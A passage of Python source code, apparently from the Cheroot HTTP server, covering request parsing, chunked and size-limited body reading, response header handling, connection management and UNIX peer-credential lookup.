v = b', '.join((existing, v))
hdict[hname] = v
return hdict
def _allow_header(self, key_name):
return True
def _transform_key(self, key_name):
# TODO: what about TE and WWW-Authenticate?
return key_name.strip().title()
class DropUnderscoreHeaderReader(HeaderReader):
"""Custom HeaderReader to exclude any headers with underscores in them."""
def _allow_header(self, key_name):
orig = super(DropUnderscoreHeaderReader, self)._allow_header(key_name)
return orig and '_' not in key_name
class SizeCheckWrapper:
"""Wraps a file-like object, raising MaxSizeExceeded if too large.
:param rfile: ``file`` of a limited size
:param int maxlen: maximum length of the file being read
"""
def __init__(self, rfile, maxlen):
"""Initialize SizeCheckWrapper instance."""
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
def _check_length(self):
if self.maxlen and self.bytes_read > self.maxlen:
raise errors.MaxSizeExceeded()
def read(self, size=None):
"""Read a chunk from ``rfile`` buffer and return it.
:param int size: amount of data to read
:returns: chunk from ``rfile``, limited by size if specified
:rtype: bytes
"""
data = self.rfile.read(size)
self.bytes_read += len(data)
self._check_length()
return data
def readline(self, size=None):
"""Read a single line from ``rfile`` buffer and return it.
:param int size: minimum amount of data to read
:returns: one line from ``rfile``
:rtype: bytes
"""
if size is not None:
data = self.rfile.readline(size)
self.bytes_read += len(data)
self._check_length()
return data
# User didn't specify a size ...
# We read the line in chunks to make sure it's not a 100MB line !
res = []
while True:
data = self.rfile.readline(256)
self.bytes_read += len(data)
self._check_length()
res.append(data)
# See https://github.com/cherrypy/cherrypy/issues/421
if len(data) < 256 or data[-1:] == LF:
return EMPTY.join(res)
def readlines(self, sizehint=0):
"""Read all lines from ``rfile`` buffer and return them.
:param int sizehint: hint of minimum amount of data to read
:returns: lines of bytes read from ``rfile``
:rtype: list[bytes]
"""
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def close(self):
"""Release resources allocated for ``rfile``."""
self.rfile.close()
def __iter__(self):
"""Return file iterator."""
return self
def __next__(self):
"""Generate next file chunk."""
data = next(self.rfile)
self.bytes_read += len(data)
self._check_length()
return data
next = __next__
class KnownLengthRFile:
"""Wraps a file-like object, returning an empty string when exhausted.
:param rfile: ``file`` of a known size
:param int content_length: length of the file being read
"""
def __init__(self, rfile, content_length):
"""Initialize KnownLengthRFile instance."""
self.rfile = rfile
self.remaining = content_length
def read(self, size=None):
"""Read a chunk from ``rfile`` buffer and return it.
:param int size: amount of data to read
:rtype: bytes
:returns: chunk from ``rfile``, limited by size if specified
"""
if self.remaining == 0:
return b''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.read(size)
self.remaining -= len(data)
return data
def readline(self, size=None):
"""Read a single line from ``rfile`` buffer and return it.
:param int size: minimum amount of data to read
:returns: one line from ``rfile``
:rtype: bytes
"""
if self.remaining == 0:
return b''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.readline(size)
self.remaining -= len(data)
return data
def readlines(self, sizehint=0):
"""Read all lines from ``rfile`` buffer and return them.
:param int sizehint: hint of minimum amount of data to read
:returns: lines of bytes read from ``rfile``
:rtype: list[bytes]
"""
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def close(self):
"""Release resources allocated for ``rfile``."""
self.rfile.close()
def __iter__(self):
"""Return file iterator."""
return self
def __next__(self):
"""Generate next file chunk."""
data = next(self.rfile)
self.remaining -= len(data)
return data
next = __next__
class ChunkedRFile:
"""Wraps a file-like object, returning an empty string when exhausted.
This class is intended to provide a conforming wsgi.input value for
request entities that have been encoded with the 'chunked' transfer
encoding.
:param rfile: file encoded with the 'chunked' transfer encoding
:param int maxlen: maximum length of the file being read
:param int bufsize: size of the buffer used to read the file
"""
def __init__(self, rfile, maxlen, bufsize=8192):
"""Initialize ChunkedRFile instance."""
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
self.buffer = EMPTY
self.bufsize = bufsize
self.closed = False
def _fetch(self):
if self.closed:
return
line = self.rfile.readline()
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise errors.MaxSizeExceeded(
'Request Entity Too Large', self.maxlen,
)
line = line.strip().split(SEMICOLON, 1)
try:
chunk_size = line.pop(0)
chunk_size = int(chunk_size, 16)
except ValueError:
raise ValueError(
'Bad chunked transfer size: {chunk_size!r}'.
format(chunk_size=chunk_size),
)
if chunk_size <= 0:
self.closed = True
return
# if line: chunk_extension = line[0]
if self.maxlen and self.bytes_read + chunk_size > self.maxlen:
raise IOError('Request Entity Too Large')
chunk = self.rfile.read(chunk_size)
self.bytes_read += len(chunk)
self.buffer += chunk
crlf = self.rfile.read(2)
if crlf != CRLF:
raise ValueError(
"Bad chunked transfer coding (expected '\\r\\n', "
'got ' + repr(crlf) + ')',
)
def read(self, size=None):
"""Read a chunk from ``rfile`` buffer and return it.
:param int size: amount of data to read
:returns: chunk from ``rfile``, limited by size if specified
:rtype: bytes
"""
data = EMPTY
if size == 0:
return data
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
if size:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
data += self.buffer
self.buffer = EMPTY
def readline(self, size=None):
"""Read a single line from ``rfile`` buffer and return it.
:param int size: minimum amount of data to read
:returns: one line from ``rfile``
:rtype: bytes
"""
data = EMPTY
if size == 0:
return data
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
newline_pos = self.buffer.find(LF)
if size:
if newline_pos == -1:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
remaining = min(size - len(data), newline_pos)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
if newline_pos == -1:
data += self.buffer
self.buffer = EMPTY
else:
data += self.buffer[:newline_pos]
self.buffer = self.buffer[newline_pos:]
def readlines(self, sizehint=0):
"""Read all lines from ``rfile`` buffer and return them.
:param int sizehint: hint of minimum amount of data to read
:returns: lines of bytes read from ``rfile``
:rtype: list[bytes]
"""
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def read_trailer_lines(self):
"""Read HTTP headers and yield them.
Returns:
Generator: yields CRLF separated lines.
"""
if not self.closed:
raise ValueError(
'Cannot read trailers until the request body has been read.',
)
while True:
line = self.rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError('Illegal end of headers.')
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise IOError('Request Entity Too Large')
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError('HTTP requires CRLF terminators')
yield line
def close(self):
"""Release resources allocated for ``rfile``."""
self.rfile.close()
class HTTPRequest:
"""An HTTP Request (and response).
A single HTTP connection may consist of multiple request/response pairs.
"""
server = None
"""The HTTPServer object which is receiving this request."""
conn = None
"""The HTTPConnection object on which this request connected."""
inheaders = {}
"""A dict of request headers."""
outheaders = []
"""A list of header tuples to write in the response."""
ready = False
"""When True, the request has been parsed and is ready to begin generating
the response. When False, signals the calling Connection that the response
should not be generated and the connection should close."""
close_connection = False
"""Signals the calling Connection that the request should close. This does
not imply an error! The client and/or server may each request that the
connection be closed."""
chunked_write = False
"""If True, output will be encoded with the "chunked" transfer-coding.
This value is set automatically inside send_headers."""
header_reader = HeaderReader()
"""
A HeaderReader instance or compatible reader.
"""
def __init__(self, server, conn, proxy_mode=False, strict_mode=True):
"""Initialize HTTP request container instance.
Args:
server (HTTPServer): web server object receiving this request
conn (HTTPConnection): HTTP connection object for this request
proxy_mode (bool): whether this HTTPServer should behave as a PROXY
server for certain requests
strict_mode (bool): whether we should return a 400 Bad Request when
we encounter a request that a HTTP compliant client should not be
making
"""
self.server = server
self.conn = conn
self.ready = False
self.started_request = False
self.scheme = b'http'
if self.server.ssl_adapter is not None:
self.scheme = b'https'
# Use the lowest-common protocol in case read_request_line errors.
self.response_protocol = 'HTTP/1.0'
self.inheaders = {}
self.status = ''
self.outheaders = []
self.sent_headers = False
self.close_connection = self.__class__.close_connection
self.chunked_read = False
self.chunked_write = self.__class__.chunked_write
self.proxy_mode = proxy_mode
self.strict_mode = strict_mode
def parse_request(self):
"""Parse the next HTTP request start-line and message-headers."""
self.rfile = SizeCheckWrapper(
self.conn.rfile,
self.server.max_request_header_size,
)
try:
success = self.read_request_line()
except errors.MaxSizeExceeded:
self.simple_response(
'414 Request-URI Too Long',
'The Request-URI sent with the request exceeds the maximum '
'allowed bytes.',
)
return
else:
if not success:
return
try:
success = self.read_request_headers()
except errors.MaxSizeExceeded:
self.simple_response(
'413 Request Entity Too Large',
'The headers sent with the request exceed the maximum '
'allowed bytes.',
)
return
else:
if not success:
return
self.ready = True
def read_request_line(self): # noqa: C901 # FIXME
"""Read and parse first line of the HTTP request.
Returns:
bool: True if the request line is valid or False if it's malformed.
"""
# HTTP/1.1 connections are persistent by default. If a client
# requests a page, then idles (leaves the connection open),
# then rfile.readline() will raise socket.error("timed out").
# Note that it does this based on the value given to settimeout(),
# and doesn't need the client to request or acknowledge the close
# (although your TCP stack might suffer for it: cf Apache's history
# with FIN_WAIT_2).
request_line = self.rfile.readline()
# Set started_request to True so communicate() knows to send 408
# from here on out.
self.started_request = True
if not request_line:
return False
if request_line == CRLF:
# RFC 2616 sec 4.1: "...if the server is reading the protocol
# stream at the beginning of a message and receives a CRLF
# first, it should ignore the CRLF."
# But only ignore one leading line! else we enable a DoS.
request_line = self.rfile.readline()
if not request_line:
return False
if not request_line.endswith(CRLF):
self.simple_response(
'400 Bad Request', 'HTTP requires CRLF terminators',
)
return False
try:
method, uri, req_protocol = request_line.strip().split(SPACE, 2)
if not req_protocol.startswith(b'HTTP/'):
self.simple_response(
'400 Bad Request', 'Malformed Request-Line: bad protocol',
)
return False
rp = req_protocol[5:].split(b'.', 1)
if len(rp) != 2:
self.simple_response(
'400 Bad Request', 'Malformed Request-Line: bad version',
)
return False
rp = tuple(map(int, rp)) # Minor.Major must be threat as integers
if rp > (1, 1):
self.simple_response(
'505 HTTP Version Not Supported', 'Cannot fulfill request',
)
return False
except (ValueError, IndexError):
self.simple_response('400 Bad Request', 'Malformed Request-Line')
return False
self.uri = uri
self.method = method.upper()
if self.strict_mode and method != self.method:
resp = (
'Malformed method name: According to RFC 2616 '
'(section 5.1.1) and its successors '
'RFC 7230 (section 3.1.1) and RFC 7231 (section 4.1) '
'method names are case-sensitive and uppercase.'
)
self.simple_response('400 Bad Request', resp)
return False
try:
if six.PY2: # FIXME: Figure out better way to do this
# Ref: https://stackoverflow.com/a/196392/595220 (like this?)
"""This is a dummy check for unicode in URI."""
ntou(bton(uri, 'ascii'), 'ascii')
scheme, authority, path, qs, fragment = urllib.parse.urlsplit(uri)
except UnicodeError:
self.simple_response('400 Bad Request', 'Malformed Request-URI')
return False
uri_is_absolute_form = (scheme or authority)
if self.method == b'OPTIONS':
# TODO: cover this branch with tests
path = (
uri
# https://tools.ietf.org/html/rfc7230#section-5.3.4
if (self.proxy_mode and uri_is_absolute_form)
else path
)
elif self.method == b'CONNECT':
# TODO: cover this branch with tests
if not self.proxy_mode:
self.simple_response('405 Method Not Allowed')
return False
# `urlsplit()` above parses "example.com:3128" as path part of URI.
# this is a workaround, which makes it detect netloc correctly
uri_split = urllib.parse.urlsplit(b''.join((b'//', uri)))
_scheme, _authority, _path, _qs, _fragment = uri_split
_port = EMPTY
try:
_port = uri_split.port
except ValueError:
pass
# FIXME: use third-party validation to make checks against RFC
# the validation doesn't take into account, that urllib parses
# invalid URIs without raising errors
# https://tools.ietf.org/html/rfc7230#section-5.3.3
invalid_path = (
_authority != uri
or not _port
or any((_scheme, _path, _qs, _fragment))
)
if invalid_path:
self.simple_response(
'400 Bad Request',
'Invalid path in Request-URI: request-'
'target must match authority-form.',
)
return False
authority = path = _authority
scheme = qs = fragment = EMPTY
else:
disallowed_absolute = (
self.strict_mode
and not self.proxy_mode
and uri_is_absolute_form
)
if disallowed_absolute:
# https://tools.ietf.org/html/rfc7230#section-5.3.2
# (absolute form)
"""Absolute URI is only allowed within proxies."""
self.simple_response(
'400 Bad Request',
'Absolute URI not allowed if server is not a proxy.',
)
return False
invalid_path = (
self.strict_mode
and not uri.startswith(FORWARD_SLASH)
and not uri_is_absolute_form
)
if invalid_path:
# https://tools.ietf.org/html/rfc7230#section-5.3.1
# (origin_form) and
"""Path should start with a forward slash."""
resp = (
'Invalid path in Request-URI: request-target must contain '
'origin-form which starts with absolute-path (URI '
'starting with a slash "/").'
)
self.simple_response('400 Bad Request', resp)
return False
if fragment:
self.simple_response(
'400 Bad Request',
'Illegal #fragment in Request-URI.',
)
return False
if path is None:
# FIXME: It looks like this case cannot happen
self.simple_response(
'400 Bad Request',
'Invalid path in Request-URI.',
)
return False
# Unquote the path+params (e.g. "/this%20path" -> "/this path").
# https://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html#sec5.1.2
#
# But note that "...a URI must be separated into its components
# before the escaped characters within those components can be
# safely decoded." https://www.ietf.org/rfc/rfc2396.txt, sec 2.4.2
# Therefore, "/this%2Fpath" becomes "/this%2Fpath", not
# "/this/path".
try:
# TODO: Figure out whether exception can really happen here.
# It looks like it's caught on urlsplit() call above.
atoms = [
urllib.parse.unquote_to_bytes(x)
for x in QUOTED_SLASH_REGEX.split(path)
]
except ValueError as ex:
self.simple_response('400 Bad Request', ex.args[0])
return False
path = QUOTED_SLASH.join(atoms)
if not path.startswith(FORWARD_SLASH):
path = FORWARD_SLASH + path
if scheme is not EMPTY:
self.scheme = scheme
self.authority = authority
self.path = path
# Note that, like wsgiref and most other HTTP servers,
# we "% HEX HEX"-unquote the path but not the query string.
self.qs = qs
# Compare request and server HTTP protocol versions, in case our
# server does not support the requested protocol. Limit our output
# to min(req, server). We want the following output:
# request server actual written supported response
# protocol protocol response protocol feature set
# a 1.0 1.0 1.0 1.0
# b 1.0 1.1 1.1 1.0
# c 1.1 1.0 1.0 1.0
# d 1.1 1.1 1.1 1.1
# Notice that, in (b), the response will be "HTTP/1.1" even though
# the client only understands 1.0. RFC 2616 10.5.6 says we should
# only return 505 if the _major_ version is different.
sp = int(self.server.protocol[5]), int(self.server.protocol[7])
if sp[0] != rp[0]:
self.simple_response('505 HTTP Version Not Supported')
return False
self.request_protocol = req_protocol
self.response_protocol = 'HTTP/%s.%s' % min(rp, sp)
return True
def read_request_headers(self): # noqa: C901 # FIXME
"""Read ``self.rfile`` into ``self.inheaders``.
Ref: :py:attr:`self.inheaders <HTTPRequest.outheaders>`.
:returns: success status
:rtype: bool
"""
# then all the http headers
try:
self.header_reader(self.rfile, self.inheaders)
except ValueError as ex:
self.simple_response('400 Bad Request', ex.args[0])
return False
mrbs = self.server.max_request_body_size
try:
cl = int(self.inheaders.get(b'Content-Length', 0))
except ValueError:
self.simple_response(
'400 Bad Request',
'Malformed Content-Length Header.',
)
return False
if mrbs and cl > mrbs:
self.simple_response(
'413 Request Entity Too Large',
'The entity sent with the request exceeds the maximum '
'allowed bytes.',
)
return False
# Persistent connection support
if self.response_protocol == 'HTTP/1.1':
# Both server and client are HTTP/1.1
if self.inheaders.get(b'Connection', b'') == b'close':
self.close_connection = True
else:
# Either the server or client (or both) are HTTP/1.0
if self.inheaders.get(b'Connection', b'') != b'Keep-Alive':
self.close_connection = True
# Transfer-Encoding support
te = None
if self.response_protocol == 'HTTP/1.1':
te = self.inheaders.get(b'Transfer-Encoding')
if te:
te = [x.strip().lower() for x in te.split(b',') if x.strip()]
self.chunked_read = False
if te:
for enc in te:
if enc == b'chunked':
self.chunked_read = True
else:
# Note that, even if we see "chunked", we must reject
# if there is an extension we don't recognize.
self.simple_response('501 Unimplemented')
self.close_connection = True
return False
# From PEP 333:
# "Servers and gateways that implement HTTP 1.1 must provide
# transparent support for HTTP 1.1's "expect/continue" mechanism.
# This may be done in any of several ways:
# 1. Respond to requests containing an Expect: 100-continue request
# with an immediate "100 Continue" response, and proceed normally.
# 2. Proceed with the request normally, but provide the application
# with a wsgi.input stream that will send the "100 Continue"
# response if/when the application first attempts to read from
# the input stream. The read request must then remain blocked
# until the client responds.
# 3. Wait until the client decides that the server does not support
# expect/continue, and sends the request body on its own.
# (This is suboptimal, and is not recommended.)
#
# We used to do 3, but are now doing 1. Maybe we'll do 2 someday,
# but it seems like it would be a big slowdown for such a rare case.
if self.inheaders.get(b'Expect', b'') == b'100-continue':
# Don't use simple_response here, because it emits headers
# we don't want. See
# https://github.com/cherrypy/cherrypy/issues/951
msg = b''.join((
self.server.protocol.encode('ascii'), SPACE, b'100 Continue',
CRLF, CRLF,
))
try:
self.conn.wfile.write(msg)
except socket.error as ex:
if ex.args[0] not in errors.socket_errors_to_ignore:
raise
return True
def respond(self):
"""Call the gateway and write its iterable output."""
mrbs = self.server.max_request_body_size
if self.chunked_read:
self.rfile = ChunkedRFile(self.conn.rfile, mrbs)
else:
cl = int(self.inheaders.get(b'Content-Length', 0))
if mrbs and mrbs < cl:
if not self.sent_headers:
self.simple_response(
'413 Request Entity Too Large',
'The entity sent with the request exceeds the '
'maximum allowed bytes.',
)
return
self.rfile = KnownLengthRFile(self.conn.rfile, cl)
self.server.gateway(self).respond()
self.ready and self.ensure_headers_sent()
if self.chunked_write:
self.conn.wfile.write(b'0\r\n\r\n')
def simple_response(self, status, msg=''):
"""Write a simple response back to the client."""
status = str(status)
proto_status = '%s %s\r\n' % (self.server.protocol, status)
content_length = 'Content-Length: %s\r\n' % len(msg)
content_type = 'Content-Type: text/plain\r\n'
buf = [
proto_status.encode('ISO-8859-1'),
content_length.encode('ISO-8859-1'),
content_type.encode('ISO-8859-1'),
]
if status[:3] in ('413', '414'):
# Request Entity Too Large / Request-URI Too Long
self.close_connection = True
if self.response_protocol == 'HTTP/1.1':
# This will not be true for 414, since read_request_line
# usually raises 414 before reading the whole line, and we
# therefore cannot know the proper response_protocol.
buf.append(b'Connection: close\r\n')
else:
# HTTP/1.0 had no 413/414 status nor Connection header.
# Emit 400 instead and trust the message body is enough.
status = '400 Bad Request'
buf.append(CRLF)
if msg:
if isinstance(msg, six.text_type):
msg = msg.encode('ISO-8859-1')
buf.append(msg)
try:
self.conn.wfile.write(EMPTY.join(buf))
except socket.error as ex:
if ex.args[0] not in errors.socket_errors_to_ignore:
raise
def ensure_headers_sent(self):
"""Ensure headers are sent to the client if not already sent."""
if not self.sent_headers:
self.sent_headers = True
self.send_headers()
def write(self, chunk):
"""Write unbuffered data to the client."""
if self.chunked_write and chunk:
chunk_size_hex = hex(len(chunk))[2:].encode('ascii')
buf = [chunk_size_hex, CRLF, chunk, CRLF]
self.conn.wfile.write(EMPTY.join(buf))
else:
self.conn.wfile.write(chunk)
def send_headers(self): # noqa: C901 # FIXME
"""Assert, process, and send the HTTP response message-headers.
You must set ``self.status``, and :py:attr:`self.outheaders
<HTTPRequest.outheaders>` before calling this.
"""
hkeys = [key.lower() for key, value in self.outheaders]
status = int(self.status[:3])
if status == 413:
# Request Entity Too Large. Close conn to avoid garbage.
self.close_connection = True
elif b'content-length' not in hkeys:
# "All 1xx (informational), 204 (no content),
# and 304 (not modified) responses MUST NOT
# include a message-body." So no point chunking.
if status < 200 or status in (204, 205, 304):
pass
else:
needs_chunked = (
self.response_protocol == 'HTTP/1.1'
and self.method != b'HEAD'
)
if needs_chunked:
# Use the chunked transfer-coding
self.chunked_write = True
self.outheaders.append((b'Transfer-Encoding', b'chunked'))
else:
# Closing the conn is the only way to determine len.
self.close_connection = True
# Override the decision to not close the connection if the connection
# manager doesn't have space for it.
if not self.close_connection:
can_keep = self.server.connections.can_add_keepalive_connection
self.close_connection = not can_keep
if b'connection' not in hkeys:
if self.response_protocol == 'HTTP/1.1':
# Both server and client are HTTP/1.1 or better
if self.close_connection:
self.outheaders.append((b'Connection', b'close'))
else:
# Server and/or client are HTTP/1.0
if not self.close_connection:
self.outheaders.append((b'Connection', b'Keep-Alive'))
if (b'Connection', b'Keep-Alive') in self.outheaders:
self.outheaders.append((
b'Keep-Alive',
u'timeout={connection_timeout}'.
format(connection_timeout=self.server.timeout).
encode('ISO-8859-1'),
))
if (not self.close_connection) and (not self.chunked_read):
# Read any remaining request body data on the socket.
# "If an origin server receives a request that does not include an
# Expect request-header field with the "100-continue" expectation,
# the request includes a request body, and the server responds
# with a final status code before reading the entire request body
# from the transport connection, then the server SHOULD NOT close
# the transport connection until it has read the entire request,
# or until the client closes the connection. Otherwise, the client
# might not reliably receive the response message. However, this
# requirement is not be construed as preventing a server from
# defending itself against denial-of-service attacks, or from
# badly broken client implementations."
remaining = getattr(self.rfile, 'remaining', 0)
if remaining > 0:
self.rfile.read(remaining)
if b'date' not in hkeys:
self.outheaders.append((
b'Date',
email.utils.formatdate(usegmt=True).encode('ISO-8859-1'),
))
if b'server' not in hkeys:
self.outheaders.append((
b'Server',
self.server.server_name.encode('ISO-8859-1'),
))
proto = self.server.protocol.encode('ascii')
buf = [proto + SPACE + self.status + CRLF]
for k, v in self.outheaders:
buf.append(k + COLON + SPACE + v + CRLF)
buf.append(CRLF)
self.conn.wfile.write(EMPTY.join(buf))
class HTTPConnection:
"""An HTTP connection (active socket)."""
remote_addr = None
remote_port = None
ssl_env = None
rbufsize = io.DEFAULT_BUFFER_SIZE
wbufsize = io.DEFAULT_BUFFER_SIZE
RequestHandlerClass = HTTPRequest
peercreds_enabled = False
peercreds_resolve_enabled = False
# Fields set by ConnectionManager.
last_used = None
def __init__(self, server, sock, makefile=MakeFile):
"""Initialize HTTPConnection instance.
Args:
server (HTTPServer): web server object receiving this request
sock (socket._socketobject): the raw socket object (usually
TCP) for this connection
makefile (file): a fileobject class for reading from the socket
"""
self.server = server
self.socket = sock
self.rfile = makefile(sock, 'rb', self.rbufsize)
self.wfile = makefile(sock, 'wb', self.wbufsize)
self.requests_seen = 0
self.peercreds_enabled = self.server.peercreds_enabled
self.peercreds_resolve_enabled = self.server.peercreds_resolve_enabled
# LRU cached methods:
# Ref: https://stackoverflow.com/a/14946506/595220
self.resolve_peer_creds = (
lru_cache(maxsize=1)(self.resolve_peer_creds)
)
self.get_peer_creds = (
lru_cache(maxsize=1)(self.get_peer_creds)
)
def communicate(self): # noqa: C901 # FIXME
"""Read each request and respond appropriately.
Returns true if the connection should be kept open.
"""
request_seen = False
try:
req = self.RequestHandlerClass(self.server, self)
req.parse_request()
if self.server.stats['Enabled']:
self.requests_seen += 1
if not req.ready:
# Something went wrong in the parsing (and the server has
# probably already made a simple_response). Return and
# let the conn close.
return False
request_seen = True
req.respond()
if not req.close_connection:
return True
except socket.error as ex:
errnum = ex.args[0]
# sadly SSL sockets return a different (longer) time out string
timeout_errs = 'timed out', 'The read operation timed out'
if errnum in timeout_errs:
# Don't error if we're between requests; only error
# if 1) no request has been started at all, or 2) we're
# in the middle of a request.
# See https://github.com/cherrypy/cherrypy/issues/853
if (not request_seen) or (req and req.started_request):
self._conditional_error(req, '408 Request Timeout')
elif errnum not in errors.socket_errors_to_ignore:
self.server.error_log(
'socket.error %s' % repr(errnum),
level=logging.WARNING, traceback=True,
)
self._conditional_error(req, '500 Internal Server Error')
except (KeyboardInterrupt, SystemExit):
raise
except errors.FatalSSLAlert:
pass
except errors.NoSSLError:
self._handle_no_ssl(req)
except Exception as ex:
self.server.error_log(
repr(ex), level=logging.ERROR, traceback=True,
)
self._conditional_error(req, '500 Internal Server Error')
return False
linger = False
def _handle_no_ssl(self, req):
if not req or req.sent_headers:
return
# Unwrap wfile
try:
resp_sock = self.socket._sock
except AttributeError:
# self.socket is of OpenSSL.SSL.Connection type
resp_sock = self.socket._socket
self.wfile = StreamWriter(resp_sock, 'wb', self.wbufsize)
msg = (
'The client sent a plain HTTP request, but '
'this server only speaks HTTPS on this port.'
)
req.simple_response('400 Bad Request', msg)
self.linger = True
def _conditional_error(self, req, response):
"""Respond with an error.
Don't bother writing if a response
has already started being written.
"""
if not req or req.sent_headers:
return
try:
req.simple_response(response)
except errors.FatalSSLAlert:
pass
except errors.NoSSLError:
self._handle_no_ssl(req)
def close(self):
"""Close the socket underlying this connection."""
self.rfile.close()
if not self.linger:
self._close_kernel_socket()
self.socket.close()
else:
# On the other hand, sometimes we want to hang around for a bit
# to make sure the client has a chance to read our entire
# response. Skipping the close() calls here delays the FIN
# packet until the socket object is garbage-collected later.
# Someday, perhaps, we'll do the full lingering_close that
# Apache does, but not today.
pass
def get_peer_creds(self): # LRU cached on per-instance basis, see __init__
"""Return the PID/UID/GID tuple of the peer socket for UNIX sockets.
This function uses SO_PEERCRED to query the UNIX PID, UID, GID
of the peer, which is only available if the bind address is
a UNIX domain socket.
Raises:
NotImplementedError: in case of unsupported socket type
RuntimeError: in case of SO_PEERCRED lookup unsupported or disabled
"""
PEERCRED_STRUCT_DEF = '3i'
if IS_WINDOWS or self.socket.family != socket.AF_UNIX:
raise NotImplementedError(
'SO_PEERCRED is only supported in Linux kernel and WSL',
)
elif not self.peercreds_enabled:
raise RuntimeError(
'Peer creds lookup is disabled within this server',
)
try:
peer_creds = self.socket.getsockopt(
# FIXME: Use LOCAL_CREDS for BSD-like OSs
# Ref: https://gist.github.com/LucaFilipozzi/e4f1e118202aff27af6aadebda1b5d91 # noqa
socket.SOL_SOCKET, socket.SO_PEERCRED,
struct.calcsize(PEERCRED_STRUCT_DEF),
)
except socket.error as socket_err:
"""Non-Linux kernels don't support SO_PEERCRED.
Refs:
http://welz.org.za/notes/on-peer-cred.html
https://github.com/daveti/tcpSockHack
msdn.microsoft.com/en-us/commandline/wsl/release_notes#build-15025
"""
six.raise_from( # 3.6+: raise RuntimeError from socket_err
RuntimeError,
socket_err,
)
else:
pid, uid, gid = struct.unpack(PEERCRED_STRUCT_DEF, peer_creds)
return pid, uid, gid
@property
def peer_pid(self):
"""Return the id of the connected peer process."""
pid, _, _ = self.get_peer_creds()
return pid
@property
def peer_uid(self):
"""Return the user id of the connected peer process."""
_, uid, _ = self.get_peer_creds()
return uid
@property
def peer_gid(self):
"""Return the group id of the connected peer process."""
_, _, gid = self.get_peer_creds()
return gid
def resolve_peer_creds(self): # LRU cached on per-instance basis
"""Look up the username and group tuple of the ``PEERCREDS``.
:returns: the username and group tuple of the ``PEERCREDS``
:raises NotImplementedError: if the OS is unsupported
:raises RuntimeError: if UID/GID lookup is unsupported or disabled
"""
if not IS_UID_GID_RESOLVABLE:
raise NotImplementedError(
'UID/GID lookup is unavailable under current platform. '
'It can only be done under UNIX-like OS '
'but not under the Google App Engine',
)
elif not self.peercreds_resolve_enabled:
raise RuntimeError(
'UID/GID lookup is disabled within this server',
)
user = pwd.getpwuid(self.peer_uid).pw_name # [0]
group = grp.getgrgid(self.peer_gid).gr_name # [0]
return user, group
@property
def peer_user(self):
"""Return the username of the connected peer process."""
user, _ = self.resolve_peer_creds()
return user
@property
def peer_group(self):
"""Return the group of the connected peer process."""
_, group = self.resolve_peer_creds()
return group
def _close_kernel_socket(self):
"""Close kernel socket in outdated Python versions.
On old Python versions,
Python's socket module does NOT call close on the kernel
socket when you call socket.close(). We do so manually here
because we want this server to send a FIN TCP segment
immediately. Note this must be called *before* calling
socket.close(), because the latter drops its reference to
the kernel socket.
"""
if six.PY2 and hasattr(self.socket, '_sock'):
self.socket._sock.close()
class HTTPServer:
"""An HTTP server."""
_bind_addr = '127.0.0.1'
_interrupt = None
gateway = None
"""A Gateway instance."""
minthreads = None
"""The minimum number of worker threads to create (default 10)."""
maxthreads = None
"""The maximum number of worker threads to create.
(default -1 = no limit)"""
server_name = None
"""The name of the server; defaults to ``self.version``."""
protocol = 'HTTP/1.1'
"""The version string to write in the Status-Line of all HTTP responses.
For example, "HTTP/1.1" is the default. This also limits the supported
features used in the response."""
request_queue_size = 5
"""The 'backlog' arg to socket.listen(); max queued connections.
(default 5)."""
shutdown_timeout = 5
"""The total time to wait for worker threads to cleanly exit.
Specified in seconds."""
timeout = 10
"""The timeout in seconds for accepted connections (default 10)."""
version = 'Cheroot/{version!s}'.format(version=__version__)
"""A version string for the HTTPServer."""
software = None
"""The value to set for the SERVER_SOFTWARE entry in the WSGI environ.
If None, this defaults to ``'%s Server' % self.version``.
"""
ready = False
"""Internal flag which indicating the socket is accepting connections."""
max_request_header_size = 0
"""The maximum size, in bytes, for request headers, or 0 for no limit."""
max_request_body_size = 0
"""The maximum size, in bytes, for request bodies, or 0 for no limit."""
nodelay = True
"""If True (the default since 3.1), sets the TCP_NODELAY socket option."""
ConnectionClass = HTTPConnection
"""The class to use for handling HTTP connections."""
ssl_adapter = None
"""An instance of ``ssl.Adapter`` (or a subclass).
Ref: :py:class:`ssl.Adapter <cheroot.ssl.Adapter>`.
You must have the corresponding TLS driver library installed.
"""
peercreds_enabled = False
"""
If :py:data:`True`, peer creds will be looked up via UNIX domain socket.
"""
peercreds_resolve_enabled = False
"""
If :py:data:`True`, username/group will be looked up in the OS from
``PEERCREDS``-provided IDs.
"""
keep_alive_conn_limit = 10
"""The maximum number of waiting keep-alive connections that will be kept open.
Default is 10. Set to None to have unlimited connections."""
def __init__(
self, bind_addr, gateway,
minthreads=10, maxthreads=-1, server_name=None,
peercreds_enabled=False, peercreds_resolve_enabled=False,
):
"""Initialize HTTPServer instance.
Args:
bind_addr (tuple): network interface to listen to
gateway (Gateway): gateway for processing HTTP requests
minthreads (int): minimum number of threads for HTTP thread pool
maxthreads (int): maximum number of threads for HTTP thread pool
server_name (str): web server name to be advertised via Server
HTTP header
"""
self.bind_addr = bind_addr
self.gateway = gateway
